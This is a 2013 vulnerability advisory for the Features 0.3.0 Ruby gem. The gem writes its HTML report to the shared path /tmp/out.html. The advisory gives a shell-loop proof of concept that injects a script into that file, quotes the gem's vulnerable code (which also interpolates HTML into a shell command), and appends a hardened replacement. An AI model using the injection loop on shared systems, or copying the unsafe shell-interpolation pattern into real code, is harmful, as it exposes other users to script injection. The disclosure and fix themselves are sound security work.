Ruby Gem Features 0.3.0 Injection
Posted Sep 9, 2013
Authored by Larry W. Cashdollar

Ruby Gem Features version 0.3.0 suffers from a file injection vulnerability that can lead to cross site scripting.

tags | exploit, xss, ruby
MD5 | cda6fa9ea76cdb6b437f75ce82bada8e

Title: Features 0.3.0 Ruby gem file injection vulnerability
Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0 
Download: http://rubygems.org/gems/features
Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"

Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html

A malicious local user who creates /tmp/out.html first and keeps writing to it can inject arbitrary HTML into the file right before the gem opens it in the browser, since the gem always writes to this fixed, world-writable path and never checks who owns the file.

PoC:
nobody@sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
This will pop up a JavaScript alert in the browser of any other user of the gem on the same host.
Code:
+--------------------[./features-0.3.0/lib/suite.rb]-------------------+

def parse_results_and_open_in_safari(results)
  html = parse_results(results).html
  %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
end

def open_in_safari(html)
  %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
end
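As an added example (not the gem's own code), here is a hardened replacement for open_in_safari that removes both weaknesses in the snippet above: the fixed shared path /tmp/out.html, and the interpolation of the HTML into a shell command line. The function names, the injectable launcher argument and the use of macOS `open` as the default launcher are my assumptions.

```ruby
require 'tmpdir'
require 'tempfile'

# Write html to a freshly created private file and return its path.
# Tempfile.create picks an unpredictable name under dir, opens it with
# O_CREAT|O_EXCL and permission 0600 (retrying with a new name if the
# file already exists), and the content goes through File#write, so no
# shell ever sees the HTML. The non-block form keeps the file on disk so
# the browser can read it afterwards.
def write_report_privately(html, dir = Dir.tmpdir)
  file = Tempfile.create(['features-report-', '.html'], dir)
  begin
    file.write(html)
  ensure
    file.close
  end
  file.path
end

# Launch the report in the default browser without going through a shell.
# The launcher is injectable so the write path can be exercised without
# spawning a browser; the default uses macOS `open` with an argv array,
# so the path is passed as a single argument and never re-parsed by /bin/sh.
def open_in_browser(html, launcher = ->(path) { system('open', path) })
  path = write_report_privately(html)
  launcher.call(path)
  path
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: quotes and shell metacharacters must survive verbatim.
  sample = "<h1>Results</h1><p>it's $HOME `whoami`; echo done</p>"
  puts open_in_browser(sample, ->(p) { puts "would open #{p}"; true })
end
```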

Vendor: Not notified
